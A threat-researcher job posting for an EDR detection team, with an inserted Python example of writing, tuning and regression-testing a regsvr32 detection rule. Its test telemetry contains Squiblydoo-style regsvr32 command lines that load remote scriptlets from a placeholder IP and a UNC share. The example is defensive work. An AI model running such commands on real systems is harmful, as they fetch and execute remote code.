Threat Researcher
About the Team:
The Arctic Wolf Threat Content Team is the owner and intellectual author of the telemetry and detection rules of our Aurora Focus (EDR) product, part of Aurora Endpoint Defense. Our team started only 3 years ago in BlackBerry-Cylance. Since then we have developed many internal tools to streamline our daily tasks, defined work standards for how to create content (detection/telemetry rules) and high-fidelity content (fine-tuning processes, reduce f), created quality assurance processes (unit, regression and E2E testing) and established communication channels with other areas such as Threat Intel and S2, without neglecting our main mission, which is to end cyber risk. We work together with the MDR, TRI, AR and CTI teams to stay ahead of the latest findings, and we are always on the lookout for new attacks, 0-days and TTP updates to keep our clients protected.
We actively participate in the purple teaming exercises performed by the AR Team, which emulate the most relevant threat actors. In our trajectory we have two MITRE ATT&CK Evaluations (Enterprise 2023 - Turla, and Managed Services 2024 - MenuPass), in both of which we participated as EDR Blue Teamers.
About the Role and Responsibilities:
- Analyse, research and develop new content for Aurora Focus, applying the MITRE ATT&CK framework.
- Convert investigations performed by our Threat Teams (TRI, AR, CTI) into new content (detection/telemetry rules).
- Customer Escalation (BFD): collaborate with S2 teams on investigations regarding emerging threats to generate new detection rules.
- Fine tuning: determining true threats or false positives and providing solutions such as exclusions, logic changes or decreased severity.
- Python scripting to automate new internal tools or projects.
- Effectively manage multiple tasks simultaneously, coordinating and ensuring scheduled goals are met.
- Keep documentation up to date for each new tool or process we add.
- Run regression and end-to-end testing.
- Push production releases and notification emails.
- Participate in Purple Teaming exercises
- Generate metrics on Databricks dashboards.
- Deliver regular threat briefing presentations to internal and external stakeholders on topics ranging from threat actor campaign activity and novel TTPs to emerging malware or exploits.
- Utilize best practices for threat research and documentation and deliver high-quality detection rules.
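The detection-content lifecycle the responsibilities above describe (write a rule against process telemetry, tune out a false positive with an exclusion, a logic change or a lower severity, then run a regression suite before release) looks roughly like the following. This is an added illustrative example written for this page, not Aurora Focus's rule format or code; the rule, the exclusion, the JSON telemetry lines, host names and the vendor path are all constructed.

```python
"""Minimal detection-rule lifecycle: rule -> fine tuning -> regression suite.

Added example with a hypothetical rule format; not Aurora Focus code.
"""
import json
import re
from dataclasses import dataclass, field, replace
from typing import Callable, Optional

# Constructed process-creation telemetry (JSON lines). Hosts, users and paths
# are invented; ws01/ws02 are Squiblydoo-style regsvr32 scriptlet loads
# (ATT&CK T1218.010), ws03 is a vendor updater legitimately using /i:,
# ws04 is benign noise, ws05 is a local /i: install string worth a look.
SAMPLE_TELEMETRY = r"""
{"host":"ws01","user":"alice","parent":"C:\\Windows\\explorer.exe","image":"C:\\Windows\\System32\\regsvr32.exe","cmdline":"regsvr32.exe /s /n /u /i:http://198.51.100.7/a.sct scrobj.dll"}
{"host":"ws02","user":"bob","parent":"C:\\Windows\\System32\\cmd.exe","image":"C:\\Windows\\System32\\regsvr32.exe","cmdline":"regsvr32.exe /s /i:\\\\fileserver\\share\\x.sct scrobj.dll"}
{"host":"ws03","user":"SYSTEM","parent":"C:\\Program Files\\ExampleCorp\\updater.exe","image":"C:\\Windows\\System32\\regsvr32.exe","cmdline":"regsvr32.exe /s /i:C:\\ProgramData\\ExampleCorp\\install.ini ecpl.dll"}
{"host":"ws04","user":"carol","parent":"C:\\Windows\\explorer.exe","image":"C:\\Windows\\System32\\notepad.exe","cmdline":"notepad.exe notes.txt"}
{"host":"ws05","user":"dave","parent":"C:\\Windows\\System32\\cmd.exe","image":"C:\\Windows\\System32\\regsvr32.exe","cmdline":"regsvr32.exe /s /i:C:\\Temp\\setup.ini foo.dll"}
"""


@dataclass
class Rule:
    name: str
    technique: str                      # ATT&CK technique ID
    image: re.Pattern                   # regex over the executing image path
    cmdline: re.Pattern                 # regex over the command line
    severity: str                       # default severity when the rule fires
    exclusions: list = field(default_factory=list)         # event -> True drops the hit
    severity_override: Optional[Callable] = None           # event -> severity string


def load_events(text: str) -> list:
    return [json.loads(line) for line in text.strip().splitlines() if line.strip()]


def matches(rule: Rule, event: dict) -> Optional[dict]:
    """Return an alert dict if the rule fires on this event, else None."""
    if not rule.image.search(event["image"]) or not rule.cmdline.search(event["cmdline"]):
        return None
    if any(excl(event) for excl in rule.exclusions):
        return None                     # tuned-out false positive
    sev = rule.severity_override(event) if rule.severity_override else rule.severity
    return {"rule": rule.name, "technique": rule.technique,
            "host": event["host"], "severity": sev}


def run(rule: Rule, events: list) -> list:
    return [hit for hit in (matches(rule, e) for e in events) if hit]


# Version 1: any regsvr32 launched with a /i: argument is 'high'. Too broad.
RULE_V1 = Rule(
    name="regsvr32_dllinstall_arg",
    technique="T1218.010",
    image=re.compile(r"\\regsvr32\.exe$", re.I),
    cmdline=re.compile(r"(^|\s)/i:", re.I),
    severity="high",
)


def vendor_updater(event: dict) -> bool:
    """Constructed exclusion added after verifying the vendor updater passes an
    install string to DllInstall via /i:. Keyed on parent AND absence of
    scrobj.dll, so a scriptlet load spawned from that directory still fires."""
    parent = event["parent"].lower()
    return (parent.startswith("c:\\program files\\examplecorp\\")
            and "scrobj.dll" not in event["cmdline"].lower())


def remote_scriptlet_severity(event: dict) -> str:
    """Logic change: keep 'high' only for the classic remote scriptlet pattern
    (/i: pointing at a URL or UNC path, scrobj.dll loaded); local install
    strings drop to 'medium' for analyst review rather than paging."""
    cl = event["cmdline"].lower()
    if "scrobj.dll" in cl and re.search(r"/i:(https?://|\\\\)", cl):
        return "high"
    return "medium"


# Version 2: same detection logic, plus the exclusion and severity tiering.
RULE_V2 = replace(RULE_V1, exclusions=[vendor_updater],
                  severity_override=remote_scriptlet_severity)


def regression(rule: Rule) -> dict:
    """Regression suite a rule must pass before release: known true positives
    still alert at the right tier, the tuned-out false positive stays silent."""
    hits = {h["host"]: h["severity"] for h in run(rule, load_events(SAMPLE_TELEMETRY))}
    return {
        "tp_remote_url_high": hits.get("ws01") == "high",
        "tp_unc_path_high": hits.get("ws02") == "high",
        "fp_vendor_updater_silent": "ws03" not in hits,
        "benign_silent": "ws04" not in hits,
        "local_install_string_medium": hits.get("ws05") == "medium",
    }


if __name__ == "__main__":
    for label, rule in (("v1", RULE_V1), ("v2", RULE_V2)):
        results = regression(rule)
        status = "PASS" if all(results.values()) else "FAIL"
        print(f"{label}: {status} {results}")
```

The exclusion is deliberately narrower than "parent is the vendor directory": an attacker who can write into that directory, or who names a dropper after the updater, would otherwise inherit the exclusion, so the check also requires that the telltale scriptlet host (scrobj.dll) is absent. The regression suite encodes both the true positives and the tuned-out false positive, so a later logic change that silently breaks either shows up as a failed check rather than a missed detection in production.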
About You:
- Relevant experience in a professional setting for threat intelligence or threat research roles
- Experience applying the MITRE ATT&CK framework to intelligence products, with the associated depth of analysis for each TTP and threat actor represented in this body of knowledge
- Experience analysing application and infrastructure telemetry (application logs, network flow logs, audit logs, metrics, core dumps, etc.)
- Experience analysing and deriving intelligence from phishing and malware campaigns, vulnerabilities being exploited in the wild, supply chain attacks and data breaches
- Understanding of threat protection/detection tooling and stacks: SIEM, XDR/EDR
- Experience working with Python scripts.
- Understanding of JSON format and regex usage
- Linux and macOS terminal usage
- Basic .sh/.bat scripting knowledge
- Windows Sysinternals
- Experience using Git repositories (GitHub, Git Bash, GitLab)
- Experience using virtual machines (VMware Workstation)
- SQL knowledge; Databricks is a plus
- LOLBins/LOLBAS knowledge
- Sigma rules knowledge
- Excellent written and verbal communication skills
- Resourceful self-starter with a positive can-do attitude
Nice to Have:
- Experience with Agile Methodology
- Experience using Elasticsearch, Kibana or Grafana
- You have delivered presentations on cybersecurity or cyber threat intelligence at industry conferences or meetups
- You have participated in sharing threat intelligence through ISACs, trust groups, intelligence partnerships or other open communities
- CISSP, OSCP, GCTI or other relevant certifications are a plus
Interview Process:
The interview process is approximately as follows:
- Phone pre-screening: A recruiter contacts you to briefly discuss your work history and provide an overview of Arctic Wolf. Approximately 30 minutes
- Technical assessment: A recruiter sends you a threat intelligence assessment to complete that will allow you to demonstrate your strategic thinking, analytical skills and your technical understanding of various threat actor TTPs, malware, vulnerabilities and/or exploits
- Face-to-face interviews: Several team members conduct interviews to learn more about you and provide more information about your potential role and team. Be prepared to discuss your technical assessment, collaborate on a technical problem and talk more about past projects and your career goals. Approximately 1 hour per interview
On-Camera Policy
To support a fair, transparent and engaging interview experience, candidates interviewing remotely are expected to be on camera during all video interviews.
Being on camera fosters authentic connection, improves communication and allows for full engagement from both candidates and interviewers.
We understand that in some cases candidates may face technical, bandwidth or location-related challenges that limit their ability to use video. If this applies to you, please let us know in advance so we can consider appropriate accommodations or find an alternative solution.
Security Requirements
Conducts duties and responsibilities in accordance with AWN's Information Security policies, standards, processes and controls to protect the confidentiality, integrity and availability of AWN business information (in accordance with our employee handbook and corporate policies).
Background checks are required for this position.
This position may require access to information protected under U.S. export control laws and regulations, including the Export Administration Regulations (EAR). Please note that, if applicable, an offer of employment will be conditioned on authorization to receive software or technology controlled under these U.S. export control laws and regulations.